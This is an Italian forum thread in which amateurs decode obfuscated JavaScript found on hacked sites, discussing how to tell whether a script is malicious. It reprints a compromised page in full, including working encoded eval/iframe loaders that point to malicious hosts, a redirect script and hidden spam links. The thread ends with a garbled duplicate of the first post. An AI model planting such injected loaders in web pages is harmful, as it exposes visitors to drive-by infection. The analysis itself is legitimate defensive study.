Decriptare javascript offuscati

juninho85 · 02-04-2008, 16:04

Questi giorni in cui ho un pò di libertà sto provando a smanettare con i tool resi disponibili da Edgar,reperibili qui.
Con l'ausilio di WebScanner,una volta letto questo report da CastleCops,mi son fatto una ricerca di tutti i siti hostati su quel server con la query unescape$Iframe,utilizzata per reindirizzare verso siti malevoli.
E saltato fuori questo crazydog.chat.ru,qui sotto trovate i sorgenti:

Codice PHP:


			
<html><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<head>
 <title>Àâòîñàëîí FIAT ã. Òþìåíü: îôèöèàëüíûé ñàéò</title>
 <meta http-equiv="Content-Type" content="text/html; Charset=Windows-1251" />
 <meta name="KeyWords" content="Îôèöèàëüíûé, ñàéò, FIAT, ã. Òþìåíü, Panda, Panda 4x4 Climbing, Grande Punto 3d, Grande Punto 5d, Croma, Doblo Panorama, Doblo Cargo, ãàðàíòèÿ, ñåðâèñ, òåõíè÷åñêîå îáñëóæèâàíèå, íîâîñòè." />
 <meta name="Description" content="Àâòîñàëîí FIAT ã. Òþìåíü" />
 <meta name="Author" content="Zebra-Group - www.zebra-group.ru">
 <meta name="Generator" content="Handmade"/>
 <link rel="Stylesheet" href="/main.css" type="text/css"/>
 <link rel="SHORTCUT ICON" href="/favicon.ico"/>


            <script language='javascript' src='http://127.0.0.1:1030/js.cgi?pca&r=19718'></script>

<script language="JavaScript" src="/java.js"></script>
</head>
<body ><html></html><html></html><html></html><html></html><html></html><html></html><html></html><html></html><html></html><html></html><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%36%37%30%34%36%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%62%65%73%74%69%6e%6c%69%76%65%2e%63%6e%2f%69%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%36%31%34%34%29%2b%27%37%34%32%62%64%36%35%32%35%62%31%5c%27%20%77%69%64%74%68%3d%35%34%34%20%68%65%69%67%68%74%3d%35%32%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

<!-- AdRiver code START Type: ZeroPixel Site: fiat.ru PZ: 0 BN: 0-->
<noscript>
<img src="http://ad.adriver.ru/cgi-bin/rle.cgi?sid=76322&bt=21&pz=0&rnd=989211744" alt="-AdRiver-" border=0 width=1 height=1>
</noscript>
<!-- AdRiver code END -->

<div id="sub">
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" width="700" height="100" id="sub_menu" align="middle">
<PARAM NAME=FlashVars  VALUE="id=1&razdel=">
<param name="allowScriptAccess" value="sameDomain" />

</object>
</div>



<param name="allowScriptAccess" value="sameDomain" />
<param name="movie" value="/img/menu_head.swf" /><param name="menu" value="false" /><param name="quality" value="high" /><p

<!-- + --><script language=\"JavaScript\"> eval(unescape(\"document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C111%2C110%2C119%2C101%2C98%2C117%2C115%2C97%2C46%2C99%2C111%2C109%2C47%2C99%2C111%2C105%2C110%2C47%2C99%2C111%2C105%2C110%2C95%2C108%2C97%2C110%2C103%2C47%2C108%2C97%2C110%2C103%2C95%2C101%2C110%2C103%2C108%2C105%2C115%2C104%2C47%2C108%2C111%2C99%2C97%2C108%2C47%2C105%2C99%2C101%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B\")); </script><!-- + -->
<!-- START CNN HOT NEWS -->
<div id="bbc_co_uk_rss" style="margin-top: -9999px;">
<table cellpadding="2" cellspacing="2">
<tr><td><a href="http://www.streamingpornsex.com/sitemap.html" title="will porn">will porn</a> - <em>will porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.bestpornsight.com/sitemap.html" title="porn here">porn here</a> - <em>porn here</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornsitecentral.com/sitemap.html" title="free porn">free porn</a> - <em>free porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornstarresource.com/sitemap.html" title="where porn">where porn</a> - <em>where porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.bargainpornsex.com/sitemap.html" title="on porn">on porn</a> - <em>on porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.vietsuperporn.com/sitemap.html" title="how porn">how porn</a> - <em>how porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornstarsolutions.com/sitemap.html" title="is porn">is porn</a> - <em>is porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.bargainpornsex.com/sitemap.html" title="la porn">la porn</a> - <em>la porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.onlineporndirectory.com/sitemap.html" title="donwload porn">donwload porn</a> - <em>donwload porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornworldcup.com/sitemap.html" title="of porn">of porn</a> - <em>of porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.cheapxxxblog.ru/sitemap.html" title="âû ïîðíî">âû ïîðíî</a> - <em>âû ïîðíî</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornwebmistressblog.ru/sitemap.html" title="ãîä ïîðíî">ãîä ïîðíî</a> - <em>ãîä ïîðíî</em> permanent link...</td></tr>
<tr><td><a href="http://www.skyblogonline.ru/sitemap.html" title="âñåãî ïîðíî">âñåãî ïîðíî</a> - <em>âñåãî ïîðíî</em> permanent link...</td></tr>
<tr><td><a href="http://www.bargainpornblog.ru/sitemap.html" title="áû ïîðíî">áû ïîðíî</a> - <em>áû ïîðíî</em> permanent link...</td></tr>
<tr><td><a href="http://www.rucespornworld.ru/sitemap.html" title="âîò ïîðíî">âîò ïîðíî</a> - <em>âîò ïîðíî</em> permanent link...</td></tr>
<tr><td><a href="http://www.christmassexblog.ru/sitemap.html" title="áûòü ïîðíî">áûòü ïîðíî</a> - <em>áûòü ïîðíî</em> permanent link...</td></tr>
<tr><td><a href="http://www.adultsexdatingblog.ru/sitemap.html" title="âåñü ïîðíî">âåñü ïîðíî</a> - <em>âåñü ïîðíî</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornblogdirect.ru/sitemap.html" title="âñå ïîðíî">âñå ïîðíî</a> - <em>âñå ïîðíî</em> permanent link...</td></tr>
<tr><td><a href="http://www.topxxxblog.ru/sitemap.html" title="â ïîðíî">â ïîðíî</a> - <em>â ïîðíî</em> permanent link...</td></tr>
<tr><td><a href="http://www.rusexmovies.ru/sitemap.html" title="ãîâîðèòü ïîðíî">ãîâîðèòü ïîðíî</a> - <em>ãîâîðèòü ïîðíî</em> permanent link...</td></tr>
<tr><td>Copyright &copy; 2007</td></tr>
</table>
</div>
</title></comment></a></div></span></ilayer></layer></iframe></center>
</noframes></style></noscript></table></script></applet></font></td></tr>

<center>
<font size="1">Chat.Ru ðåêîìåíäóåò:</font> 
<a target="_blank" href="http://www.asia.ru/"><font size="1">Ïðîèçâîäèòåëè,</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">òîâàðû,</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">îáîðóäîâàíèå:</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">Êèòàé,</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">Èíäèÿ,</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">ßïîíèÿ,</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">Ñèíãàïóð</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">Òàéâàíü</font></a>
</center>
</body>
</html>
<!-- END CNN HOT NEWS -->

notare questo:

Codice PHP:


			
unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%36%37%30%34%36%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%62%65%73%74%69%6e%6c%69%76%65%2e%63%6e%2f%69%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%36%31%34%34%29%2b%27%37%34%32%62%64%36%35%32%35%62%31%5c%27%20%77%69%64%74%68%3d%35%34%34%20%68%65%69%67%68%74%3d%35%32%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")

tradotto col tool Deobfuscating javascript tool
ottengo,traducendo con chiave 9:

Codice PHP:


			
window.status="Done";document.write("<iframename=67046src=\"http://bestinlive.cn/i/index.php?"+Math.round(Math.random()*286144)+"742bd6525b1\"width=544height=526style=\"display:none\"></iframe>")

Alla fine della fiera:come capisco se uno javascript è maligno o meno?

Inserendo il sito:

Codice PHP:


			
http://bestinlive.cn/i/index.php

su finjan ottengo questo
Volevo chiedervi se la lamerata è andata a buon fine,perchè è la prima volta che provo a comprendere questo chezzo di sistema!

juninho85 · 02-04-2008, 16:31

questo invece contenuto in chezbacbacool.com

Codice PHP:


			
%66%75%6E%63%74%69%6F%6E%20%44%5F%28%42%5F%29%7B%76%61%72%20%41%5F%2C%4E%5F%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%53%5F%3D%30%2C%54%5F%3D%22%22%2C%4C%32%5F%3D%54%5F%2C%5A%5F%2C%50%5F%2C%53%5F%3B%66%6F%72%28%41%5F%3D%30%3B%41%5F%3C%32%35%36%3B%41%5F%2B%2B%29%7B%5A%5F%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%41%5F%29%3B%69%66%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%3C%30%29%4C%32%5F%2B%3D%5A%5F%3B%7D%3B%66%6F%72%28%41%5F%3D%30%3B%41%5F%3C%42%5F%2E%6C%65%6E%67%74%68%3B%41%5F%2B%2B%29%7B%5A%5F%3D%42%5F%2E%63%68%61%72%41%74%28%41%5F%29%3B%69%66%28%54%5F%2E%6C%65%6E%67%74%68%3E%31%30%32%34%29%7B%53%5F%2B%2B%3B%4E%5F%5B%53%5F%5D%3D%54%5F%3B%54%5F%3D%22%22%7D%69%66%28%5A%5F%3D%3D%22%25%22%29%7B%41%5F%2B%2B%3B%54%5F%2B%3D%4C%32%5F%2E%63%68%61%72%41%74%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%42%5F%2E%63%68%61%72%41%74%28%41%5F%29%29%29%7D%65%6C%73%65%7B%69%66%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%3E%2D%31%29%7B%54%5F%2B%3D%4C%31%5F%2E%63%68%61%72%41%74%28%4C%31%5F%2E%6C%65%6E%67%74%68%2D%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%2D%31%29%7D%65%6C%73%65%7B%54%5F%2B%3D%5A%5F%7D%7D%7D%66%6F%72%28%41%5F%3D%53%5F%3B%41%5F%3E%30%3B%41%5F%2D%2D%29%54%5F%3D%4E%5F%5B%41%5F%5D%20%2B%54%5F%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%28%64%6F%63%75%6D%65%6E%74%2E%6C%61%79%65%72%73%7C%7C%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%29%3F%75%6E%65%73%63%61%70%65%28%65%73%63%61%70%65%28%54%5F%29%29%3A%54%5F%29%7D

tradotto:

Codice PHP:


			
function D_(B_){var A_,N_=new Array(),S_=0,T_="",L2_=T_,Z_,P_,S_;for(A_=0;A_<256;A_  ){Z_=String.fromCharCode(A_);if(L1_.indexOf(Z_)<0)L2_ =Z_;};for(A_=0;A_<B_.length;A_  ){Z_=B_.charAt(A_);if(T_.length>1024){S_  ;N_[S_]=T_;T_=""}if(Z_=="%"){A_  ;T_ =L2_.charAt(L1_.indexOf(B_.charAt(A_)))}else{if(L1_.indexOf(Z_)>-1){T_ =L1_.charAt(L1_.length-L1_.indexOf(Z_)-1)}else{T_ =Z_}}}for(A_=S_;A_>0;A_--)T_=N_[A_]  T_;document.write((document.layers||document.all)?unescape(escape(T_)):T_)

non è maligno,giusto?
da cosa ve ne accorgete?

juninho85 · 02-04-2008, 18:04

questo invece dovrebbe esser maligno

Codice PHP:


			
zi6c1zjsocfi1.blogspot.com

Codice PHP:


			
<p><script language="javascript">document.write(unescape("[b]%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%22%68%74%74%70%3A%2F%2F%62%6F%75%67%68%74%6D%6F%72%65%2E%63%6F%6D%22%29%3B%3C%2F%73%63%72%69%70%74%3E[/b]"));</script></p>

tradotto:

Codice PHP:


			
<scriptlanguage="javascript">location.replace("http://boughtmore.com");</script>

anche se reindirizza a

Codice PHP:


			
http://boughtmore.com

di per se non sembra malevolo,a meno che per voi fare un pò di scorta di cialis lo sia

Gianky....! :D :) · 02-04-2008, 22:40

Quote:

Originariamente inviato da juninho85

questo invece contenuto in chezbacbacool.com

Codice PHP:


			
%66%75%6E%63%74%69%6F%6E%20%44%5F%28%42%5F%29%7B%76%61%72%20%41%5F%2C%4E%5F%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%53%5F%3D%30%2C%54%5F%3D%22%22%2C%4C%32%5F%3D%54%5F%2C%5A%5F%2C%50%5F%2C%53%5F%3B%66%6F%72%28%41%5F%3D%30%3B%41%5F%3C%32%35%36%3B%41%5F%2B%2B%29%7B%5A%5F%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%41%5F%29%3B%69%66%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%3C%30%29%4C%32%5F%2B%3D%5A%5F%3B%7D%3B%66%6F%72%28%41%5F%3D%30%3B%41%5F%3C%42%5F%2E%6C%65%6E%67%74%68%3B%41%5F%2B%2B%29%7B%5A%5F%3D%42%5F%2E%63%68%61%72%41%74%28%41%5F%29%3B%69%66%28%54%5F%2E%6C%65%6E%67%74%68%3E%31%30%32%34%29%7B%53%5F%2B%2B%3B%4E%5F%5B%53%5F%5D%3D%54%5F%3B%54%5F%3D%22%22%7D%69%66%28%5A%5F%3D%3D%22%25%22%29%7B%41%5F%2B%2B%3B%54%5F%2B%3D%4C%32%5F%2E%63%68%61%72%41%74%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%42%5F%2E%63%68%61%72%41%74%28%41%5F%29%29%29%7D%65%6C%73%65%7B%69%66%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%3E%2D%31%29%7B%54%5F%2B%3D%4C%31%5F%2E%63%68%61%72%41%74%28%4C%31%5F%2E%6C%65%6E%67%74%68%2D%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%2D%31%29%7D%65%6C%73%65%7B%54%5F%2B%3D%5A%5F%7D%7D%7D%66%6F%72%28%41%5F%3D%53%5F%3B%41%5F%3E%30%3B%41%5F%2D%2D%29%54%5F%3D%4E%5F%5B%41%5F%5D%20%2B%54%5F%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%28%64%6F%63%75%6D%65%6E%74%2E%6C%61%79%65%72%73%7C%7C%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%29%3F%75%6E%65%73%63%61%70%65%28%65%73%63%61%70%65%28%54%5F%29%29%3A%54%5F%29%7D

tradotto:

Codice PHP:


			
function D_(B_){var A_,N_=new Array(),S_=0,T_="",L2_=T_,Z_,P_,S_;for(A_=0;A_<256;A_  ){Z_=String.fromCharCode(A_);if(L1_.indexOf(Z_)<0)L2_ =Z_;};for(A_=0;A_<B_.length;A_  ){Z_=B_.charAt(A_);if(T_.length>1024){S_  ;N_[S_]=T_;T_=""}if(Z_=="%"){A_  ;T_ =L2_.charAt(L1_.indexOf(B_.charAt(A_)))}else{if(L1_.indexOf(Z_)>-1){T_ =L1_.charAt(L1_.length-L1_.indexOf(Z_)-1)}else{T_ =Z_}}}for(A_=S_;A_>0;A_--)T_=N_[A_]  T_;document.write((document.layers||document.all)?unescape(escape(T_)):T_)

non è maligno,giusto?
da cosa ve ne accorgete?

Dal fatto che il javascript non contiene contiene link/url

MUAHAHAHHAHA

juninho85 · 02-04-2008, 22:42

Quote:

Originariamente inviato da Gianky....! :D :)

Dal fatto che il javascript non contiene contiene link/url

MUAHAHAHHAHA

l'ho pensato pure io,però non mi spiego la necessità di criptarlo in quel modo

W.S. · 03-04-2008, 09:17

Quote:

Originariamente inviato da juninho85

Alla fine della fiera:come capisco se uno javascript è maligno o meno?

Leggendo il codice e comprendendo quello che fa. Se tenta di eseguire qualcosa che non vuoi che la tua macchina esegua, allora è da considerare maligno.
Non è detto che se contiene url è maligno, potrebbe essere il link di un menu e un collegamento lecito.

Offuscare il codice dovrebbe servire ad evitare la copia del codice stesso. A volte chi coda lo offusca per non farsi copiare le idee. Il che è abbastanza assurdo parlando di javascript visto che è sempre possibile decifrarlo. Altre volte si è convinti che offuscandolo si possa nascondere qualche procedura sensibile, come l'autenticazione.. inutile dire che è ancora più assurdo.
L'utilità più grande dell'offuscamento javascript è rivolta agli attaccanti, viene usato per nascondere ai tool di rilevamento automatico il codice. Un utente accorto riuscirà sempre a capire cosa viene eseguito ma un programma automatico è facilmente aggirabile (a volte addirittura sfruttabile per i propri scopi)

juninho85 · 03-04-2008, 09:56

in poche parole "basta" essere in grado di capire il linguaggio...è il caso che mi metta a studiare

02-04-2008, 16:04	#1
juninho85 Bannato Iscritto dal: Mar 2004 Città: Galapagos Attenzione:utente flautolente,tienilo a mente Messaggi: 28983	Decriptare javascript offuscati Questi giorni in cui ho un pò di libertà sto provando a smanettare con i tool resi disponibili da Edgar,reperibili qui. Con l'ausilio di WebScanner,una volta letto questo report da CastleCops,mi son fatto una ricerca di tutti i siti hostati su quel server con la query unescape$Iframe,utilizzata per reindirizzare verso siti malevoli. E saltato fuori questo crazydog.chat.ru,qui sotto trovate i sorgenti: Codice PHP: <html><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <head> <title>Àâòîñàëîí FIAT ã. Òþìåíü: îôèöèàëüíûé ñàéò</title> <meta http-equiv="Content-Type" content="text/html; Charset=Windows-1251" /> <meta name="KeyWords" content="Îôèöèàëüíûé, ñàéò, FIAT, ã. Òþìåíü, Panda, Panda 4x4 Climbing, Grande Punto 3d, Grande Punto 5d, Croma, Doblo Panorama, Doblo Cargo, ãàðàíòèÿ, ñåðâèñ, òåõíè÷åñêîå îáñëóæèâàíèå, íîâîñòè." /> <meta name="Description" content="Àâòîñàëîí FIAT ã. Òþìåíü" /> <meta name="Author" content="Zebra-Group - www.zebra-group.ru"> <meta name="Generator" content="Handmade"/> <link rel="Stylesheet" href="/main.css" type="text/css"/> <link rel="SHORTCUT ICON" href="/favicon.ico"/> <script language='javascript' src='http://127.0.0.1:1030/js.cgi?pca&r=19718'></script> <script language="JavaScript" src="/java.js"></script> </head> <body ><html></html><html></html><html></html><html></html><html></html><html></html><html></html><html></html><html></html><html></html><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%36%37%30%34%36%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%62%65%73%74%69%6e%6c%69%76%65%2e%63%6e%2f%69%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%36%31%34%34%29%2b%27%37%34%32%62%64%36%35%32%35%62%31%5c%27%20%77%69%64%74%68%3d%35%34%34%20%68%65%69%67%68%74%3d%35%32%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script> <!-- AdRiver code START Type: ZeroPixel Site: fiat.ru PZ: 0 BN: 0--> <noscript> <img src="http://ad.adriver.ru/cgi-bin/rle.cgi?sid=76322&bt=21&pz=0&rnd=989211744" alt="-AdRiver-" border=0 width=1 height=1> </noscript> <!-- AdRiver code END --> <div id="sub"> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" width="700" height="100" id="sub_menu" align="middle"> <PARAM NAME=FlashVars VALUE="id=1&razdel="> <param name="allowScriptAccess" value="sameDomain" /> </object> </div> <param name="allowScriptAccess" value="sameDomain" /> <param name="movie" value="/img/menu_head.swf" /><param name="menu" value="false" /><param name="quality" value="high" /><p <!-- + --><script language=\"JavaScript\"> eval(unescape(\"document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C111%2C110%2C119%2C101%2C98%2C117%2C115%2C97%2C46%2C99%2C111%2C109%2C47%2C99%2C111%2C105%2C110%2C47%2C99%2C111%2C105%2C110%2C95%2C108%2C97%2C110%2C103%2C47%2C108%2C97%2C110%2C103%2C95%2C101%2C110%2C103%2C108%2C105%2C115%2C104%2C47%2C108%2C111%2C99%2C97%2C108%2C47%2C105%2C99%2C101%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B\")); </script><!-- + --> <!-- START CNN HOT NEWS --> <div id="bbc_co_uk_rss" style="margin-top: -9999px;"> <table cellpadding="2" cellspacing="2"> <tr><td><a href="http://www.streamingpornsex.com/sitemap.html" title="will porn">will porn</a> - <em>will porn</em> permanent link...</td></tr> <tr><td><a href="http://www.bestpornsight.com/sitemap.html" title="porn here">porn here</a> - <em>porn here</em> permanent link...</td></tr> <tr><td><a href="http://www.pornsitecentral.com/sitemap.html" title="free porn">free porn</a> - <em>free porn</em> permanent link...</td></tr> <tr><td><a href="http://www.pornstarresource.com/sitemap.html" title="where porn">where porn</a> - <em>where porn</em> permanent link...</td></tr> <tr><td><a href="http://www.bargainpornsex.com/sitemap.html" title="on porn">on porn</a> - <em>on porn</em> permanent link...</td></tr> <tr><td><a href="http://www.vietsuperporn.com/sitemap.html" title="how porn">how porn</a> - <em>how porn</em> permanent link...</td></tr> <tr><td><a href="http://www.pornstarsolutions.com/sitemap.html" title="is porn">is porn</a> - <em>is porn</em> permanent link...</td></tr> <tr><td><a href="http://www.bargainpornsex.com/sitemap.html" title="la porn">la porn</a> - <em>la porn</em> permanent link...</td></tr> <tr><td><a href="http://www.onlineporndirectory.com/sitemap.html" title="donwload porn">donwload porn</a> - <em>donwload porn</em> permanent link...</td></tr> <tr><td><a href="http://www.pornworldcup.com/sitemap.html" title="of porn">of porn</a> - <em>of porn</em> permanent link...</td></tr> <tr><td><a href="http://www.cheapxxxblog.ru/sitemap.html" title="âû ïîðíî">âû ïîðíî</a> - <em>âû ïîðíî</em> permanent link...</td></tr> <tr><td><a href="http://www.pornwebmistressblog.ru/sitemap.html" title="ãîä ïîðíî">ãîä ïîðíî</a> - <em>ãîä ïîðíî</em> permanent link...</td></tr> <tr><td><a href="http://www.skyblogonline.ru/sitemap.html" title="âñåãî ïîðíî">âñåãî ïîðíî</a> - <em>âñåãî ïîðíî</em> permanent link...</td></tr> <tr><td><a href="http://www.bargainpornblog.ru/sitemap.html" title="áû ïîðíî">áû ïîðíî</a> - <em>áû ïîðíî</em> permanent link...</td></tr> <tr><td><a href="http://www.rucespornworld.ru/sitemap.html" title="âîò ïîðíî">âîò ïîðíî</a> - <em>âîò ïîðíî</em> permanent link...</td></tr> <tr><td><a href="http://www.christmassexblog.ru/sitemap.html" title="áûòü ïîðíî">áûòü ïîðíî</a> - <em>áûòü ïîðíî</em> permanent link...</td></tr> <tr><td><a href="http://www.adultsexdatingblog.ru/sitemap.html" title="âåñü ïîðíî">âåñü ïîðíî</a> - <em>âåñü ïîðíî</em> permanent link...</td></tr> <tr><td><a href="http://www.pornblogdirect.ru/sitemap.html" title="âñå ïîðíî">âñå ïîðíî</a> - <em>âñå ïîðíî</em> permanent link...</td></tr> <tr><td><a href="http://www.topxxxblog.ru/sitemap.html" title="â ïîðíî">â ïîðíî</a> - <em>â ïîðíî</em> permanent link...</td></tr> <tr><td><a href="http://www.rusexmovies.ru/sitemap.html" title="ãîâîðèòü ïîðíî">ãîâîðèòü ïîðíî</a> - <em>ãîâîðèòü ïîðíî</em> permanent link...</td></tr> <tr><td>Copyright © 2007</td></tr> </table> </div> </title></comment></a></div></span></ilayer></layer></iframe></center> </noframes></style></noscript></table></script></applet></font></td></tr> <center> <font size="1">Chat.Ru ðåêîìåíäóåò:</font> <a target="_blank" href="http://www.asia.ru/"><font size="1">Ïðîèçâîäèòåëè,</font></a>   <a target="_blank" href="http://www.asia.ru/"><font size="1">òîâàðû,</font></a>   <a target="_blank" href="http://www.asia.ru/"><font size="1">îáîðóäîâàíèå:</font></a>   <a target="_blank" href="http://www.asia.ru/"><font size="1">Êèòàé,</font></a>   <a target="_blank" href="http://www.asia.ru/"><font size="1">Èíäèÿ,</font></a>   <a target="_blank" href="http://www.asia.ru/"><font size="1">ßïîíèÿ,</font></a>   <a target="_blank" href="http://www.asia.ru/"><font size="1">Ñèíãàïóð</font></a>   <a target="_blank" href="http://www.asia.ru/"><font size="1">Òàéâàíü</font></a> </center> </body> </html> <!-- END CNN HOT NEWS --> notare questo: Codice PHP: unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%36%37%30%34%36%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%62%65%73%74%69%6e%6c%69%76%65%2e%63%6e%2f%69%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%36%31%34%34%29%2b%27%37%34%32%62%64%36%35%32%35%62%31%5c%27%20%77%69%64%74%68%3d%35%34%34%20%68%65%69%67%68%74%3d%35%32%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29") tradotto col tool Deobfuscating javascript tool ottengo,traducendo con chiave 9: Codice PHP: `window.status="Done";document.write("<iframename=67046src=\"http://bestinlive.cn/i/index.php?"+Math.round(Math.random()286144)+"742bd6525b1\"width=544height=526style=\"display:none\"></iframe>")` Alla fine della fiera:come capisco se uno javascript è maligno o meno?Inserendo il sito: Codice PHP: `http://bestinlive.cn/i/index.php` su finjan ottengo questo Volevo chiedervi se la lamerata è andata a buon fine,perchè è la prima volta che provo a comprendere questo chezzo di sistema! Ultima modifica di juninho85 : 02-04-2008 alle 16:11.*

02-04-2008, 16:31	#2
juninho85 Bannato Iscritto dal: Mar 2004 Città: Galapagos Attenzione:utente flautolente,tienilo a mente Messaggi: 28983	questo invece contenuto in chezbacbacool.com Codice PHP: 